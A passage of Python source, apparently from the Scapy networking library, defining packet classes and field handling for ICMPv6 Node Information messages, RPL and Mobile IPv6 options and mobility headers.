2592 

2593 

2594class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): 

2595 name = "ICMPv6 Node Information Query - IPv6 Address Query" 

2596 qtype = 3 

2597 flags = 0x3E 

2598 

2599 

2600class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): 

2601 name = "ICMPv6 Node Information Query - IPv4 Address Query" 

2602 qtype = 4 

2603 

2604 

2605_nireply_code = {0: "Successful Reply", 

2606 1: "Response Refusal", 

2607 3: "Unknown query type"} 

2608 

2609_nireply_flags = {1: "Reply set incomplete", 

2610 2: "All unicast addresses", 

2611 4: "IPv4 addresses", 

2612 8: "Link-local addresses", 

2613 16: "Site-local addresses", 

2614 32: "Global addresses"} 

2615 

2616# Internal repr is one of those : 

2617# (0, "some string") : unknown qtype value are mapped to that one 

2618# (3, [ (ttl, ip6), ... ]) 

2619# (4, [ (ttl, ip4), ... ]) 

2620# (2, [ttl, dns_names]) : dns_names is one string that contains 

2621# all the DNS names. Internally it is kept ready to be sent 

2622# (undissected). i2repr() decode it for user. This is to 

2623# make build after dissection bijective. 

2624# 

2625# I also merged getfield() and m2i(), and addfield() and i2m(). 

2626 

2627 

2628class NIReplyDataField(StrField): 

2629 

2630 def i2h(self, pkt, x): 

2631 if x is None: 

2632 return x 

2633 t, val = x 

2634 if t == 2: 

2635 ttl, dnsnames = val 

2636 val = [ttl] + dnsrepr2names(dnsnames) 

2637 return val 

2638 

2639 def h2i(self, pkt, x): 

2640 qtype = 0 # We will decode it as string if not 

2641 # overridden through 'qtype' in pkt 

2642 

2643 # No user hint, let's use 'qtype' value for that purpose 

2644 if not isinstance(x, tuple): 

2645 if pkt is not None: 

2646 qtype = pkt.qtype 

2647 else: 

2648 qtype = x[0] 

2649 x = x[1] 

2650 

2651 # From that point on, x is the value (second element of the tuple) 

2652 

2653 if qtype == 2: # DNS name 

2654 if isinstance(x, (str, bytes)): # listify the string 

2655 x = [x] 

2656 if isinstance(x, list): 

2657 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 

2658 if x and isinstance(x[0], int): 

2659 ttl = x[0] 

2660 names = x[1:] 

2661 else: 

2662 ttl = 0 

2663 names = x 

2664 return (2, [ttl, names2dnsrepr(names)]) 

2665 

2666 elif qtype in [3, 4]: # IPv4 or IPv6 addr 

2667 if not isinstance(x, list): 

2668 x = [x] # User directly provided an IP, instead of list 

2669 

2670 def fixvalue(x): 

2671 # List elements are not tuples, user probably 

2672 # omitted ttl value : we will use 0 instead 

2673 if not isinstance(x, tuple): 

2674 x = (0, x) 

2675 # Decode bytes 

2676 if isinstance(x[1], bytes): 

2677 x = (x[0], x[1].decode()) 

2678 return x 

2679 

2680 return (qtype, [fixvalue(d) for d in x]) 

2681 

2682 return (qtype, x) 

2683 

2684 def addfield(self, pkt, s, val): 

2685 t, tmp = val 

2686 if tmp is None: 

2687 tmp = b"" 

2688 if t == 2: 

2689 ttl, dnsstr = tmp 

2690 return s + struct.pack("!I", ttl) + dnsstr 

2691 elif t == 3: 

2692 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 

2693 elif t == 4: 

2694 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 

2695 else: 

2696 return s + tmp 

2697 

2698 def getfield(self, pkt, s): 

2699 code = getattr(pkt, "code") 

2700 if code != 0: 

2701 return s, (0, b"") 

2702 

2703 qtype = getattr(pkt, "qtype") 

2704 if qtype == 0: # NOOP 

2705 return s, (0, b"") 

2706 

2707 elif qtype == 2: 

2708 if len(s) < 4: 

2709 return s, (0, b"") 

2710 ttl = struct.unpack("!I", s[:4])[0] 

2711 return b"", (2, [ttl, s[4:]]) 

2712 

2713 elif qtype == 3: # IPv6 addresses with TTLs 

2714 # XXX TODO : get the real length 

2715 res = [] 

2716 while len(s) >= 20: # 4 + 16 

2717 ttl = struct.unpack("!I", s[:4])[0] 

2718 ip = inet_ntop(socket.AF_INET6, s[4:20]) 

2719 res.append((ttl, ip)) 

2720 s = s[20:] 

2721 return s, (3, res) 

2722 

2723 elif qtype == 4: # IPv4 addresses with TTLs 

2724 # XXX TODO : get the real length 

2725 res = [] 

2726 while len(s) >= 8: # 4 + 4 

2727 ttl = struct.unpack("!I", s[:4])[0] 

2728 ip = inet_ntop(socket.AF_INET, s[4:8]) 

2729 res.append((ttl, ip)) 

2730 s = s[8:] 

2731 return s, (4, res) 

2732 else: 

2733 # XXX TODO : implement me and deal with real length 

2734 return b"", (0, s) 

2735 

2736 def i2repr(self, pkt, x): 

2737 if x is None: 

2738 return "[]" 

2739 

2740 if isinstance(x, tuple) and len(x) == 2: 

2741 t, val = x 

2742 if t == 2: # DNS names 

2743 ttl, tmp_len = val 

2744 tmp_len = dnsrepr2names(tmp_len) 

2745 names_list = (plain_str(name) for name in tmp_len) 

2746 return "ttl:%d %s" % (ttl, ",".join(names_list)) 

2747 elif t == 3 or t == 4: 

2748 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 

2749 return repr(val) 

2750 return repr(x) # XXX should not happen 

2751 

2752# By default, sent responses have code set to 0 (successful) 

2753 

2754 

2755class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): 

2756 name = "ICMPv6 Node Information Reply - NOOP Reply" 

2757 fields_desc = [ByteEnumField("type", 140, icmp6types), 

2758 ByteEnumField("code", 0, _nireply_code), 

2759 XShortField("cksum", None), 

2760 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2761 BitField("unused", 0, 10), 

2762 FlagsField("flags", 0, 6, "TACLSG"), 

2763 NonceField("nonce", None), 

2764 NIReplyDataField("data", None)] 

2765 

2766 

2767class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): 

2768 name = "ICMPv6 Node Information Reply - Node Names" 

2769 qtype = 2 

2770 

2771 

2772class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): 

2773 name = "ICMPv6 Node Information Reply - IPv6 addresses" 

2774 qtype = 3 

2775 

2776 

2777class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): 

2778 name = "ICMPv6 Node Information Reply - IPv4 addresses" 

2779 qtype = 4 

2780 

2781 

2782class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): 

2783 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" 

2784 code = 1 

2785 

2786 

2787class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): 

2788 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" 

2789 code = 2 

2790 

2791 

2792def _niquery_guesser(p): 

2793 cls = conf.raw_layer 

2794 type = orb(p[0]) 

2795 if type == 139: # Node Info Query specific stuff 

2796 if len(p) > 6: 

2797 qtype, = struct.unpack("!H", p[4:6]) 

2798 cls = {0: ICMPv6NIQueryNOOP, 

2799 2: ICMPv6NIQueryName, 

2800 3: ICMPv6NIQueryIPv6, 

2801 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) 

2802 elif type == 140: # Node Info Reply specific stuff 

2803 code = orb(p[1]) 

2804 if code == 0: 

2805 if len(p) > 6: 

2806 qtype, = struct.unpack("!H", p[4:6]) 

2807 cls = {2: ICMPv6NIReplyName, 

2808 3: ICMPv6NIReplyIPv6, 

2809 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) 

2810 elif code == 1: 

2811 cls = ICMPv6NIReplyRefuse 

2812 elif code == 2: 

2813 cls = ICMPv6NIReplyUnknown 

2814 return cls 

2815 

2816 

2817############################################################################# 

2818############################################################################# 

2819# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 

2820############################################################################# 

2821############################################################################# 

2822 

2823# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes 

2824rplcodes = {0: "DIS", 

2825 1: "DIO", 

2826 2: "DAO", 

2827 3: "DAO-ACK", 

2828 # 4: "P2P-DRO", 

2829 # 5: "P2P-DRO-ACK", 

2830 # 6: "Measurement", 

2831 7: "DCO", 

2832 8: "DCO-ACK"} 

2833 

2834 

2835class ICMPv6RPL(_ICMPv6): # RFC 6550 

2836 name = 'RPL' 

2837 fields_desc = [ByteEnumField("type", 155, icmp6types), 

2838 ByteEnumField("code", 0, rplcodes), 

2839 XShortField("cksum", None)] 

2840 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} 

2841 

2842 

2843############################################################################# 

2844############################################################################# 

2845# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 

2846############################################################################# 

2847############################################################################# 

2848 

2849# Mobile IPv6 ICMPv6 related classes 

2850 

2851class ICMPv6HAADRequest(_ICMPv6): 

2852 name = 'ICMPv6 Home Agent Address Discovery Request' 

2853 fields_desc = [ByteEnumField("type", 144, icmp6types), 

2854 ByteField("code", 0), 

2855 XShortField("cksum", None), 

2856 XShortField("id", None), 

2857 BitEnumField("R", 1, 1, {1: 'MR'}), 

2858 XBitField("res", 0, 15)] 

2859 

2860 def hashret(self): 

2861 return struct.pack("!H", self.id) + self.payload.hashret() 

2862 

2863 

2864class ICMPv6HAADReply(_ICMPv6): 

2865 name = 'ICMPv6 Home Agent Address Discovery Reply' 

2866 fields_desc = [ByteEnumField("type", 145, icmp6types), 

2867 ByteField("code", 0), 

2868 XShortField("cksum", None), 

2869 XShortField("id", None), 

2870 BitEnumField("R", 1, 1, {1: 'MR'}), 

2871 XBitField("res", 0, 15), 

2872 IP6ListField('addresses', None)] 

2873 

2874 def hashret(self): 

2875 return struct.pack("!H", self.id) + self.payload.hashret() 

2876 

2877 def answers(self, other): 

2878 if not isinstance(other, ICMPv6HAADRequest): 

2879 return 0 

2880 return self.id == other.id 

2881 

2882 

2883class ICMPv6MPSol(_ICMPv6): 

2884 name = 'ICMPv6 Mobile Prefix Solicitation' 

2885 fields_desc = [ByteEnumField("type", 146, icmp6types), 

2886 ByteField("code", 0), 

2887 XShortField("cksum", None), 

2888 XShortField("id", None), 

2889 XShortField("res", 0)] 

2890 

2891 def _hashret(self): 

2892 return struct.pack("!H", self.id) 

2893 

2894 

2895class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2896 name = 'ICMPv6 Mobile Prefix Advertisement' 

2897 fields_desc = [ByteEnumField("type", 147, icmp6types), 

2898 ByteField("code", 0), 

2899 XShortField("cksum", None), 

2900 XShortField("id", None), 

2901 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), 

2902 XBitField("res", 0, 14)] 

2903 

2904 def hashret(self): 

2905 return struct.pack("!H", self.id) 

2906 

2907 def answers(self, other): 

2908 return isinstance(other, ICMPv6MPSol) 

2909 

2910# Mobile IPv6 Options classes 

2911 

2912 

2913_mobopttypes = {2: "Binding Refresh Advice", 

2914 3: "Alternate Care-of Address", 

2915 4: "Nonce Indices", 

2916 5: "Binding Authorization Data", 

2917 6: "Mobile Network Prefix (RFC3963)", 

2918 7: "Link-Layer Address (RFC4068)", 

2919 8: "Mobile Node Identifier (RFC4283)", 

2920 9: "Mobility Message Authentication (RFC4285)", 

2921 10: "Replay Protection (RFC4285)", 

2922 11: "CGA Parameters Request (RFC4866)", 

2923 12: "CGA Parameters (RFC4866)", 

2924 13: "Signature (RFC4866)", 

2925 14: "Home Keygen Token (RFC4866)", 

2926 15: "Care-of Test Init (RFC4866)", 

2927 16: "Care-of Test (RFC4866)"} 

2928 

2929 

2930class _MIP6OptAlign(Packet): 

2931 """ Mobile IPv6 options have alignment requirements of the form x*n+y. 

2932 This class is inherited by all MIPv6 options to help in computing the 

2933 required Padding for that option, i.e. the need for a Pad1 or PadN 

2934 option before it. They only need to provide x and y as class 

2935 parameters. (x=0 and y=0 are used when no alignment is required)""" 

2936 

2937 __slots__ = ["x", "y"] 

2938 

2939 def alignment_delta(self, curpos): 

2940 x = self.x 

2941 y = self.y 

2942 if x == 0 and y == 0: 

2943 return 0 

2944 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

2945 return delta 

2946 

2947 def extract_padding(self, p): 

2948 return b"", p 

2949 

2950 

2951class MIP6OptBRAdvice(_MIP6OptAlign): 

2952 name = 'Mobile IPv6 Option - Binding Refresh Advice' 

2953 fields_desc = [ByteEnumField('otype', 2, _mobopttypes), 

2954 ByteField('olen', 2), 

2955 ShortField('rinter', 0)] 

2956 x = 2 

2957 y = 0 # alignment requirement: 2n 

2958 

2959 

2960class MIP6OptAltCoA(_MIP6OptAlign): 

2961 name = 'MIPv6 Option - Alternate Care-of Address' 

2962 fields_desc = [ByteEnumField('otype', 3, _mobopttypes), 

2963 ByteField('olen', 16), 

2964 IP6Field("acoa", "::")] 

2965 x = 8 

2966 y = 6 # alignment requirement: 8n+6 

2967 

2968 

2969class MIP6OptNonceIndices(_MIP6OptAlign): 

2970 name = 'MIPv6 Option - Nonce Indices' 

2971 fields_desc = [ByteEnumField('otype', 4, _mobopttypes), 

2972 ByteField('olen', 16), 

2973 ShortField('hni', 0), 

2974 ShortField('coni', 0)] 

2975 x = 2 

2976 y = 0 # alignment requirement: 2n 

2977 

2978 

2979class MIP6OptBindingAuthData(_MIP6OptAlign): 

2980 name = 'MIPv6 Option - Binding Authorization Data' 

2981 fields_desc = [ByteEnumField('otype', 5, _mobopttypes), 

2982 ByteField('olen', 16), 

2983 BitField('authenticator', 0, 96)] 

2984 x = 8 

2985 y = 2 # alignment requirement: 8n+2 

2986 

2987 

2988class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 

2989 name = 'NEMO Option - Mobile Network Prefix' 

2990 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

2991 ByteField("olen", 18), 

2992 ByteField("reserved", 0), 

2993 ByteField("plen", 64), 

2994 IP6Field("prefix", "::")] 

2995 x = 8 

2996 y = 4 # alignment requirement: 8n+4 

2997 

2998 

2999class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 

3000 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" 

3001 fields_desc = [ByteEnumField("otype", 7, _mobopttypes), 

3002 ByteField("olen", 7), 

3003 ByteEnumField("ocode", 2, _rfc4068_lla_optcode), 

3004 ByteField("pad", 0), 

3005 MACField("lla", ETHER_ANY)] # Only support ethernet 

3006 x = 0 

3007 y = 0 # alignment requirement: none 

3008 

3009 

3010class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 

3011 name = "MIPv6 Option - Mobile Node Identifier" 

3012 fields_desc = [ByteEnumField("otype", 8, _mobopttypes), 

3013 FieldLenField("olen", None, length_of="id", fmt="B", 

3014 adjust=lambda pkt, x: x + 1), 

3015 ByteEnumField("subtype", 1, {1: "NAI"}), 

3016 StrLenField("id", "", 

3017 length_from=lambda pkt: pkt.olen - 1)] 

3018 x = 0 

3019 y = 0 # alignment requirement: none 

3020 

3021# We only support decoding and basic build. Automatic HMAC computation is 

3022# too much work for our current needs. It is left to the user (I mean ... 

3023# you). --arno 

3024 

3025 

3026class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) 

3027 name = "MIPv6 Option - Mobility Message Authentication" 

3028 fields_desc = [ByteEnumField("otype", 9, _mobopttypes), 

3029 FieldLenField("olen", None, length_of="authdata", fmt="B", 

3030 adjust=lambda pkt, x: x + 5), 

3031 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 

3032 2: "MN-AAA authentication mobility option"}), # noqa: E501 

3033 IntField("mspi", None), 

3034 StrLenField("authdata", "A" * 12, 

3035 length_from=lambda pkt: pkt.olen - 5)] 

3036 x = 4 

3037 y = 1 # alignment requirement: 4n+1 

3038 

3039# Extracted from RFC 1305 (NTP) : 

3040# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 

3041# in seconds relative to 0h on 1 January 1900. The integer part is in the 

3042# first 32 bits and the fraction part in the last 32 bits. 

3043 

3044 

3045class NTPTimestampField(LongField): 

3046 def i2repr(self, pkt, x): 

3047 if x < ((50 * 31536000) << 32): 

3048 return "Some date a few decades ago (%d)" % x 

3049 

3050 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to 

3051 # January 1st 1970 : 

3052 delta = -2209075761 

3053 i = int(x >> 32) 

3054 j = float(x & 0xffffffff) * 2.0**-32 

3055 res = i + j + delta 

3056 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) 

3057 

3058 return "%s (%d)" % (t, x) 

3059 

3060 

3061class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) 

3062 name = "MIPv6 option - Replay Protection" 

3063 fields_desc = [ByteEnumField("otype", 10, _mobopttypes), 

3064 ByteField("olen", 8), 

3065 NTPTimestampField("timestamp", 0)] 

3066 x = 8 

3067 y = 2 # alignment requirement: 8n+2 

3068 

3069 

3070class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) 

3071 name = "MIPv6 option - CGA Parameters Request" 

3072 fields_desc = [ByteEnumField("otype", 11, _mobopttypes), 

3073 ByteField("olen", 0)] 

3074 x = 0 

3075 y = 0 # alignment requirement: none 

3076 

3077# XXX TODO: deal with CGA param fragmentation and build of defragmented 

3078# XXX version. Passing of a big CGAParam structure should be 

3079# XXX simplified. Make it hold packets, by the way --arno 

3080 

3081 

3082class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) 

3083 name = "MIPv6 option - CGA Parameters" 

3084 fields_desc = [ByteEnumField("otype", 12, _mobopttypes), 

3085 FieldLenField("olen", None, length_of="cgaparams", fmt="B"), 

3086 StrLenField("cgaparams", "", 

3087 length_from=lambda pkt: pkt.olen)] 

3088 x = 0 

3089 y = 0 # alignment requirement: none 

3090 

3091 

3092class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) 

3093 name = "MIPv6 option - Signature" 

3094 fields_desc = [ByteEnumField("otype", 13, _mobopttypes), 

3095 FieldLenField("olen", None, length_of="sig", fmt="B"), 

3096 StrLenField("sig", "", 

3097 length_from=lambda pkt: pkt.olen)] 

3098 x = 0 

3099 y = 0 # alignment requirement: none 

3100 

3101 

3102class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) 

3103 name = "MIPv6 option - Home Keygen Token" 

3104 fields_desc = [ByteEnumField("otype", 14, _mobopttypes), 

3105 FieldLenField("olen", None, length_of="hkt", fmt="B"), 

3106 StrLenField("hkt", "", 

3107 length_from=lambda pkt: pkt.olen)] 

3108 x = 0 

3109 y = 0 # alignment requirement: none 

3110 

3111 

3112class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) 

3113 name = "MIPv6 option - Care-of Test Init" 

3114 fields_desc = [ByteEnumField("otype", 15, _mobopttypes), 

3115 ByteField("olen", 0)] 

3116 x = 0 

3117 y = 0 # alignment requirement: none 

3118 

3119 

3120class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) 

3121 name = "MIPv6 option - Care-of Test" 

3122 fields_desc = [ByteEnumField("otype", 16, _mobopttypes), 

3123 FieldLenField("olen", None, length_of="cokt", fmt="B"), 

3124 StrLenField("cokt", b'\x00' * 8, 

3125 length_from=lambda pkt: pkt.olen)] 

3126 x = 0 

3127 y = 0 # alignment requirement: none 

3128 

3129 

3130class MIP6OptUnknown(_MIP6OptAlign): 

3131 name = 'Scapy6 - Unknown Mobility Option' 

3132 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

3133 FieldLenField("olen", None, length_of="odata", fmt="B"), 

3134 StrLenField("odata", "", 

3135 length_from=lambda pkt: pkt.olen)] 

3136 x = 0 

3137 y = 0 # alignment requirement: none 

3138 

3139 @classmethod 

3140 def dispatch_hook(cls, _pkt=None, *_, **kargs): 

3141 if _pkt: 

3142 o = orb(_pkt[0]) # Option type 

3143 if o in moboptcls: 

3144 return moboptcls[o] 

3145 return cls 

3146 

3147 

3148moboptcls = {0: Pad1, 

3149 1: PadN, 

3150 2: MIP6OptBRAdvice, 

3151 3: MIP6OptAltCoA, 

3152 4: MIP6OptNonceIndices, 

3153 5: MIP6OptBindingAuthData, 

3154 6: MIP6OptMobNetPrefix, 

3155 7: MIP6OptLLAddr, 

3156 8: MIP6OptMNID, 

3157 9: MIP6OptMsgAuth, 

3158 10: MIP6OptReplayProtection, 

3159 11: MIP6OptCGAParamsReq, 

3160 12: MIP6OptCGAParams, 

3161 13: MIP6OptSignature, 

3162 14: MIP6OptHomeKeygenToken, 

3163 15: MIP6OptCareOfTestInit, 

3164 16: MIP6OptCareOfTest} 

3165 

3166 

3167# Main Mobile IPv6 Classes 

3168 

3169mhtypes = {0: 'BRR', 

3170 1: 'HoTI', 

3171 2: 'CoTI', 

3172 3: 'HoT', 

3173 4: 'CoT', 

3174 5: 'BU', 

3175 6: 'BA', 

3176 7: 'BE', 

3177 8: 'Fast BU', 

3178 9: 'Fast BA', 

3179 10: 'Fast NA'} 

3180 

3181# From http://www.iana.org/assignments/mobility-parameters 

3182bastatus = {0: 'Binding Update accepted', 

3183 1: 'Accepted but prefix discovery necessary', 

3184 128: 'Reason unspecified', 

3185 129: 'Administratively prohibited', 

3186 130: 'Insufficient resources', 

3187 131: 'Home registration not supported', 

3188 132: 'Not home subnet', 

3189 133: 'Not home agent for this mobile node', 

3190 134: 'Duplicate Address Detection failed', 

3191 135: 'Sequence number out of window', 

3192 136: 'Expired home nonce index', 

3193 137: 'Expired care-of nonce index', 

3194 138: 'Expired nonces', 

3195 139: 'Registration type change disallowed', 

3196 140: 'Mobile Router Operation not permitted', 

3197 141: 'Invalid Prefix', 

3198 142: 'Not Authorized for Prefix', 

3199 143: 'Forwarding Setup failed (prefixes missing)', 

3200 144: 'MIPV6-ID-MISMATCH', 

3201 145: 'MIPV6-MESG-ID-REQD', 

3202 146: 'MIPV6-AUTH-FAIL', 

3203 147: 'Permanent home keygen token unavailable', 

3204 148: 'CGA and signature verification failed', 

3205 149: 'Permanent home keygen token exists', 

3206 150: 'Non-null home nonce index expected'} 

3207 

3208 

3209class _MobilityHeader(Packet): 

3210 name = 'Dummy IPv6 Mobility Header' 

3211 overload_fields = {IPv6: {"nh": 135}} 

3212 

3213 def post_build(self, p, pay): 

3214 p += pay 

3215 tmp_len = self.len 

3216 if self.len is None: 

3217 tmp_len = (len(p) - 8) // 8 

3218 p = p[:1] + struct.pack("B", tmp_len) + p[2:] 

3219 if self.cksum is None: 

3220 cksum = in6_chksum(135, self.underlayer, p) 

3221 else: 

3222 cksum = self.cksum 

3223 p = p[:4] + struct.pack("!H", cksum) + p[6:] 

3224 return p 

3225 

3226 

3227class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg 

3228 name = "IPv6 Mobility Header - Generic Message" 

3229 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3230 ByteField("len", None), 

3231 ByteEnumField("mhtype", None, mhtypes), 

3232 ByteField("res", None), 

3233 XShortField("cksum", None), 

3234 StrLenField("msg", b"\x00" * 2, 

3235 length_from=lambda pkt: 8 * pkt.len - 6)] 

3236 

3237 

3238class MIP6MH_BRR(_MobilityHeader): 

3239 name = "IPv6 Mobility Header - Binding Refresh Request" 

3240 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3241 ByteField("len", None), 

3242 ByteEnumField("mhtype", 0, mhtypes), 

3243 ByteField("res", None), 

3244 XShortField("cksum", None), 

3245 ShortField("res2", None), 

3246 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3247 _OptionsField("options", [], MIP6OptUnknown, 8, 

3248 length_from=lambda pkt: 8 * pkt.len)] 

3249 overload_fields = {IPv6: {"nh": 135}} 

3250 

3251 def hashret(self): 

3252 # Hack: BRR, BU and BA have the same hashret that returns the same 

3253 # value b"\x00\x08\x09" (concatenation of mhtypes). This is 

3254 # because we need match BA with BU and BU with BRR. --arno 

3255 return b"\x00\x08\x09" 

3256 

3257 

3258class MIP6MH_HoTI(_MobilityHeader): 

3259 name = "IPv6 Mobility Header - Home Test Init" 

3260 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3261 ByteField("len", None), 

3262 ByteEnumField("mhtype", 1, mhtypes), 

3263 ByteField("res", None), 

3264 XShortField("cksum", None), 

3265 StrFixedLenField("reserved", b"\x00" * 2, 2), 

3266 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3267 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3268 _OptionsField("options", [], MIP6OptUnknown, 16, 

3269 length_from=lambda pkt: 8 * (pkt.len - 1))] 

3270 overload_fields = {IPv6: {"nh": 135}} 

3271 

3272 def hashret(self): 

3273 return bytes_encode(self.cookie) 

3274 

3275 

3276class MIP6MH_CoTI(MIP6MH_HoTI): 

3277 name = "IPv6 Mobility Header - Care-of Test Init" 

3278 mhtype = 2 

3279 

3280 def hashret(self): 

3281 return bytes_encode(self.cookie) 

3282 

3283 

3284class MIP6MH_HoT(_MobilityHeader): 

3285 name = "IPv6 Mobility Header - Home Test" 

3286 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3287 ByteField("len", None), 

3288 ByteEnumField("mhtype", 3, mhtypes), 

3289 ByteField("res", None), 

3290 XShortField("cksum", None), 

3291 ShortField("index", None), 

3292 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3293 StrFixedLenField("token", b"\x00" * 8, 8), 

3294 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3295 _OptionsField("options", [], MIP6OptUnknown, 24, 

3296 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3297 overload_fields = {IPv6: {"nh": 135}} 

3298 

3299 def hashret(self): 

3300 return bytes_encode(self.cookie) 

3301 

3302 def answers(self, other): 

3303 if (isinstance(other, MIP6MH_HoTI) and 

3304 self.cookie == other.cookie): 

3305 return 1 

3306 return 0 

3307 

3308 

3309class MIP6MH_CoT(MIP6MH_HoT): 

3310 name = "IPv6 Mobility Header - Care-of Test" 

3311 mhtype = 4 

3312 

3313 def hashret(self): 

3314 return bytes_encode(self.cookie) 

3315 

3316 def answers(self, other): 

3317 if (isinstance(other, MIP6MH_CoTI) and 

3318 self.cookie == other.cookie): 

3319 return 1 

3320 return 0 

3321 

3322 

3323class LifetimeField(ShortField): 

3324 def i2repr(self, pkt, x): 

3325 return "%d sec" % (4 * x) 

3326 

3327 

3328class MIP6MH_BU(_MobilityHeader): 

3329 name = "IPv6 Mobility Header - Binding Update" 

3330 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3331 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3332 ByteEnumField("mhtype", 5, mhtypes), 

3333 ByteField("res", None), 

3334 XShortField("cksum", None), 

3335 XShortField("seq", None), # TODO: ShortNonceField 

3336 FlagsField("flags", "KHA", 7, "PRMKLHA"), 

3337 XBitField("reserved", 0, 9), 

3338 LifetimeField("mhtime", 3), # unit == 4 seconds 

3339 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3340 _OptionsField("options", [], MIP6OptUnknown, 12, 

3341 length_from=lambda pkt: 8 * pkt.len - 4)] 

3342 overload_fields = {IPv6: {"nh": 135}} 

3343 

3344 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3345 return b"\x00\x08\x09" 

3346 

3347 def answers(self, other): 

3348 if isinstance(other, MIP6MH_BRR): 

3349 return 1 

3350 return 0 

3351 

3352 

3353class MIP6MH_BA(_MobilityHeader): 

3354 name = "IPv6 Mobility Header - Binding ACK" 

3355 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3356 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3357 ByteEnumField("mhtype", 6, mhtypes), 

3358 ByteField("res", None), 

3359 XShortField("cksum", None), 

3360 ByteEnumField("status", 0, bastatus), 

3361 FlagsField("flags", "K", 3, "PRK"), 

3362 XBitField("res2", None, 5), 

3363 XShortField("seq", None), # TODO: ShortNonceField 

3364 XShortField("mhtime", 0), # unit == 4 seconds 

3365 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3366 _OptionsField("options", [], MIP6OptUnknown, 12, 

3367 length_from=lambda pkt: 8 * pkt.len - 4)] 

3368 overload_fields = {IPv6: {"nh": 135}} 

3369 

3370 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3371 return b"\x00\x08\x09" 

3372 

3373 def answers(self, other): 

3374 if (isinstance(other, MIP6MH_BU) and 

3375 other.mhtype == 5 and 

3376 self.mhtype == 6 and 

3377 other.flags & 0x1 and # Ack request flags is set 

3378 self.seq == other.seq): 

3379 return 1 

3380 return 0 

3381 

3382 

3383_bestatus = {1: 'Unknown binding for Home Address destination option', 

3384 2: 'Unrecognized MH Type value'} 

3385 

3386# TODO: match Binding Error to its stimulus 

3387 

3388 

3389class MIP6MH_BE(_MobilityHeader): 

3390 name = "IPv6 Mobility Header - Binding Error" 

3391 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3392 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3393 ByteEnumField("mhtype", 7, mhtypes), 

3394 ByteField("res", 0), 

3395 XShortField("cksum", None), 

3396 ByteEnumField("status", 0, _bestatus), 

3397 ByteField("reserved", 0), 

3398 IP6Field("ha", "::"), 

3399 _OptionsField("options", [], MIP6OptUnknown, 24, 

3400 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3401 overload_fields = {IPv6: {"nh": 135}} 

3402 

3403 

3404_mip6_mhtype2cls = {0: MIP6MH_BRR, 

3405 1: MIP6MH_HoTI, 

